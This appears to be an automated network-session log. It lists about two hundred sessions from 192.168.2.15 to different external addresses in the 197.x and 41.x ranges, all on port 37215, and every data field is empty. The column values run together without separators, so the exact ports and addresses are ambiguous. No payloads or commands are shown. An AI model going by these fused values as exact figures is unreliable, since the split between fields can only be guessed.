                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19355192.168.2.1555954197.146.142.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19356192.168.2.1546438197.174.133.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19357192.168.2.1555658197.192.161.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19358192.168.2.1552730197.240.18.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19359192.168.2.1560388197.209.162.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19360192.168.2.1541014197.197.186.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19361192.168.2.1554234197.152.82.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19362192.168.2.1558334197.190.206.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19363192.168.2.1537616197.0.227.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19364192.168.2.1556324197.114.1.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19365192.168.2.1542572197.218.155.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19366192.168.2.1553426197.25.30.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19367192.168.2.1555060197.195.7.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19368192.168.2.1552992197.223.101.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19369192.168.2.1534758197.79.41.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19370192.168.2.1550942197.2.223.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19371192.168.2.1553602197.45.182.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19372192.168.2.1541762197.81.160.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19373192.168.2.1534200197.14.91.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19374192.168.2.1541702197.144.57.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19375192.168.2.1533478197.47.155.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19376192.168.2.1540866197.238.19.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19377192.168.2.1547262197.243.255.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19378192.168.2.1549820197.249.89.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19379192.168.2.1551696197.241.130.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19380192.168.2.1555650197.212.161.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19381192.168.2.1541046197.26.36.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19382192.168.2.1559372197.238.70.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19383192.168.2.1540232197.239.231.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19384192.168.2.1549050197.210.130.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19385192.168.2.1535318197.237.21.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19386192.168.2.1552644197.123.207.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19387192.168.2.1533632197.118.34.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19388192.168.2.1543066197.99.250.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19389192.168.2.1534038197.151.231.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19390192.168.2.1539420197.51.52.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19391192.168.2.1558738197.118.23.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19392192.168.2.1549402197.99.228.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19393192.168.2.1547422197.45.236.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19394192.168.2.1546840197.76.20.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19395192.168.2.1548414197.209.76.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19396192.168.2.1547496197.65.171.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19397192.168.2.1547850197.49.32.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19398192.168.2.1537212197.8.80.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19399192.168.2.1551722197.8.57.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19400192.168.2.1547128197.140.50.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19401192.168.2.1556730197.215.39.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19402192.168.2.1535358197.91.216.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19403192.168.2.1534674197.235.17.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19404192.168.2.155278241.137.193.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19405192.168.2.153592441.76.231.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19406192.168.2.153887241.157.12.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19407192.168.2.153864441.217.44.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19408192.168.2.155213041.195.106.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19409192.168.2.154063041.62.188.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19410192.168.2.154231641.141.69.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19411192.168.2.155946041.179.128.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19412192.168.2.155036241.175.28.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19413192.168.2.153687641.150.153.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19414192.168.2.154489641.85.242.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19415192.168.2.155952841.129.135.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19416192.168.2.155077841.161.15.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19417192.168.2.154424041.237.115.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19418192.168.2.154312241.70.24.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19419192.168.2.155610041.38.28.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19420192.168.2.153916041.181.122.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19421192.168.2.153293641.116.158.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19422192.168.2.156082241.227.164.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19423192.168.2.155594441.225.104.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19424192.168.2.155198441.23.254.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19425192.168.2.154184041.50.56.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19426192.168.2.155329441.175.95.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19427192.168.2.154838041.34.178.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19428192.168.2.153809041.169.63.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19429192.168.2.154868441.177.135.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19430192.168.2.155222041.237.190.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19431192.168.2.155471241.80.148.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19432192.168.2.154458441.118.204.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19433192.168.2.155178841.136.7.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19434192.168.2.155812841.5.134.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19435192.168.2.153495241.195.98.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19436192.168.2.155449641.52.56.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19437192.168.2.154054841.116.252.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19438192.168.2.155504041.143.125.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19439192.168.2.155606041.77.182.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19440192.168.2.153934041.218.87.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19441192.168.2.154805041.99.216.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19442192.168.2.155251041.48.124.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19443192.168.2.155946441.71.86.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19444192.168.2.153370241.84.27.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19445192.168.2.155179841.31.216.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19446192.168.2.154869841.72.29.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19447192.168.2.154680441.243.201.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19448192.168.2.155356241.153.249.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19449192.168.2.153438841.237.209.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19450192.168.2.153934241.253.231.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19451192.168.2.155571641.232.222.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19452192.168.2.154967041.11.164.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19453192.168.2.153730241.53.105.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19454192.168.2.154809841.110.130.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19455192.168.2.155992841.145.89.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19456192.168.2.155185641.28.205.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19457192.168.2.153453041.208.236.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19458192.168.2.154292241.235.160.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19459192.168.2.153440641.158.21.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19460192.168.2.156051441.210.79.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19461192.168.2.154679041.226.37.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19462192.168.2.155634241.252.162.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19463192.168.2.154061441.85.150.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19464192.168.2.155206641.29.183.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19465192.168.2.153619241.189.104.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19466192.168.2.155690441.58.141.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19467192.168.2.154598641.0.29.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19468192.168.2.156024241.23.25.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19469192.168.2.154893841.133.151.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19470192.168.2.155838241.170.204.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19471192.168.2.154091041.53.80.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19472192.168.2.155456041.154.6.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19473192.168.2.155325841.1.43.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19474192.168.2.155533041.197.211.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19475192.168.2.153646641.59.9.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19476192.168.2.155294641.162.44.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19477192.168.2.153362241.27.163.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19478192.168.2.155132841.79.168.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19479192.168.2.155300641.227.148.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19480192.168.2.154709041.30.112.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19481192.168.2.154115641.222.187.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19482192.168.2.155806641.21.34.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19483192.168.2.154227841.81.204.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19484192.168.2.155190041.113.228.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19485192.168.2.154004441.146.169.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19486192.168.2.154105041.217.84.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19487192.168.2.154905441.30.223.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19488192.168.2.154151041.197.55.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19489192.168.2.154213241.48.139.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19490192.168.2.155393841.170.227.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19491192.168.2.155617241.228.195.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19492192.168.2.153889241.241.129.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19493192.168.2.154047041.177.43.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19494192.168.2.153609841.188.91.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19495192.168.2.155778441.220.241.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19496192.168.2.155936841.35.238.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19497192.168.2.153917441.51.20.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19498192.168.2.154757441.132.162.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19499192.168.2.156083641.191.195.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19500192.168.2.155491641.149.130.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19501192.168.2.155333041.192.186.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19502192.168.2.154107241.58.216.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19503192.168.2.154402041.191.201.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19504192.168.2.153559841.101.105.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19505192.168.2.155909041.37.81.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19506192.168.2.154749441.80.233.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19507192.168.2.154398441.237.198.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19508192.168.2.154463441.99.164.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19509192.168.2.154591641.43.103.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19510192.168.2.154467241.111.208.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19511192.168.2.155298441.131.253.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19512192.168.2.154359041.30.135.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19513192.168.2.154166641.87.26.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19514192.168.2.153863441.249.5.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19515192.168.2.155616441.180.45.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19516192.168.2.155154641.33.50.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19517192.168.2.155282041.220.93.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19518192.168.2.153576041.252.102.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19519192.168.2.155981841.207.1.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19520192.168.2.153687041.35.159.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19521192.168.2.153818441.165.164.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19522192.168.2.153982841.108.1.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19523192.168.2.153432041.199.251.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19524192.168.2.154954641.165.82.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19525192.168.2.155399041.119.172.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19526192.168.2.153307641.130.231.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19527192.168.2.154441241.87.227.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19528192.168.2.155009241.108.205.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19529192.168.2.154345241.149.5.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19530192.168.2.153883241.70.44.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19531192.168.2.156085641.98.129.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19532192.168.2.153592441.188.33.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19533192.168.2.154435641.16.179.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19534192.168.2.155527041.213.162.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19535192.168.2.153506241.8.40.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19536192.168.2.153697241.34.212.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19537192.168.2.154464841.104.155.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19538192.168.2.153616241.18.240.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19539192.168.2.155328841.223.147.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19540192.168.2.155460841.190.253.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19541192.168.2.153736641.132.203.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19542192.168.2.155547841.208.199.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19543192.168.2.153923041.115.127.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19544192.168.2.154033241.119.118.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19545192.168.2.153308641.132.93.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19546192.168.2.155335641.14.82.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19547192.168.2.154011841.77.65.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19548192.168.2.155325641.253.124.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19549192.168.2.155413841.118.184.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19550192.168.2.155191041.228.49.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19551192.168.2.155084841.189.142.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19552192.168.2.155423641.26.77.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19553192.168.2.154080041.136.180.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19554192.168.2.155098041.183.58.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19555192.168.2.154797041.197.202.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19556192.168.2.155199641.37.138.12637215
                                                                            TimestampBytes transferredDirectionData


